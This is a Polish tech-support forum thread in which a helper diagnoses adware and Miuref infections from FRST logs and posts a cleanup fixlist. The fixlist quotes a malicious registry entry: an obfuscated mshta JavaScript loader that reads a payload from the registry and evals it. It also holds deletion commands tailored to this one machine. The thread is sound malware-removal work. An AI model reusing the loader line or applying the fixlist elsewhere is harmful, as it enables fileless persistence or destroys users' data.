Skocz do zawartości

Nie działający PPM - właściwości


Rekomendowane odpowiedzi

Od jakiegoś czasu komputer ponownie zaczął mi zamulać.
Tym razem wypadło na eksploratora Windows, który się tnie aż za bardzo i zastanawiam, czy nie przypadkiem pozostałości po ostatnich wojażach z czyszczeniami nie są tego przyczyną.
Główny problem polega na tym, że nie działa PPM - właściwości (tzn menu kontekstowe działa, ale nie pojawia się okno z właściwościami).

 

Umieszczam logi FRST. Z góry dziękuję

 

EDIT: Dodatkowo, podczas uruchamiania pojawia się taki błąd:
Nie można załadować modułu "C:\Users\rober\AppData\Local\lbsoft\bassTrust.dll".
Upewnij się, że plik binarny jest przechowywany w określonej ścieżce (oczywiście nie jest) lub zdebuguj go, aby sprawdzić czy występują problemy z plikiem binarnym lub zależnymi plikami DLL.
Nie można odnaleźć określonego modułu

Addition.txt

FRST.txt

Shortcut.txt

Edytowane przez Rucek
Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

System jest zainfekowany przez nowoczesne adware podstawiające fałszywą kopię przeglądarkę Google Chrome. Do tego dochodzą dwie infekcje Win32/Miuref (KLIK) oraz inna, niezidentyfikowana zakneblowana w rejestrze. Przypuszczalnie jest uszkodzona usługa winmgmt.

 

1. Otwórz Notatnik i wklej w nim:

 

CloseProcesses:
CreateRestorePoint:
HKLM\...\Policies\Explorer: [] 1
HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\...\Run: [ibsoft] => regsvr32.exe C:\Users\rober\AppData\Local\Ibsoft\bassTrust.dll 
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} =>  -> Brak pliku
SearchScopes: HKU\S-1-5-21-3797074174-2719608703-2427757124-1057 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = 
HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Tooltony\Application\chrome.exe 
RemoveDirectory: C:\Program Files (x86)\Tooltony
S3 dbx; system32\DRIVERS\dbx.sys [X]
HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\...\StartupApproved\Run: => "YSPack"
HKU\S-1-5-21-3797074174-2719608703-2427757124-1057\Software\Classes\929e3: "C:\WINDOWS\system32\mshta.exe" "javascript:obxi5j9TR="QqmpimHi";dr6=new ActiveXObject("WScript.Shell");xvaC4eb2="I";Yng82J=dr6.RegRead("HKCU\\software\\aurgjr\\aclehngaac");Z4ob1mPdd="34b";eval(Yng82J);tHKOs1T="pxl0QBT";" 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cygwin\Cygwin64 Terminal.lnk
C:\Users\rober\AppData\Roaming\Microsoft\Excel\Kopia_Kopia_Lista_termin_0_oceny_koncowe305858052441186973\Kopia_Kopia_Lista_termin_0_oceny_koncowe.xls.lnk
C:\Users\rober\AppData\Roaming\Microsoft\Excel\KALKULATOR%20DOCHODU305849803376288589\KALKULATOR%20DOCHODU.xls.lnk
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\rober\AppData\Local\Mozilla
C:\Users\rober\AppData\Roaming\Mozilla
C:\Users\rober\AppData\Roaming\Profiles
C:\Program Files (x86)\Mozilla Firefox
C:\ProgramData\Mozilla
Reg: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winmgmt /s
FindFolder: *Tooltony*;*Ibsoft*
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

  • Zresetuj synchronizację (o ile włączona): KLIK.
  • Ustawienia > karta Rozszerzenia > odinstaluj wszystkie inne nieznane i niepotrzebne Ci rozszerzenia
  • Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
  • Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin
3. Zastosuj AdwCleaner z opcji najpierw Szukaj, a następnie z opcji Oczyść. Dostarcz raport z tego działania.

 

4. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 

 

5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

tooltony

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 

 

6. Zrób raport z narzędzia Farbar Service Scanner (FSS) i zaprezentuj go na forum. 

 

7. Zrób nowy log FRST z opcji Skanuj (Scan) już bez Addition i Shortcut. Dołącz też plik fixlog.txt.

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...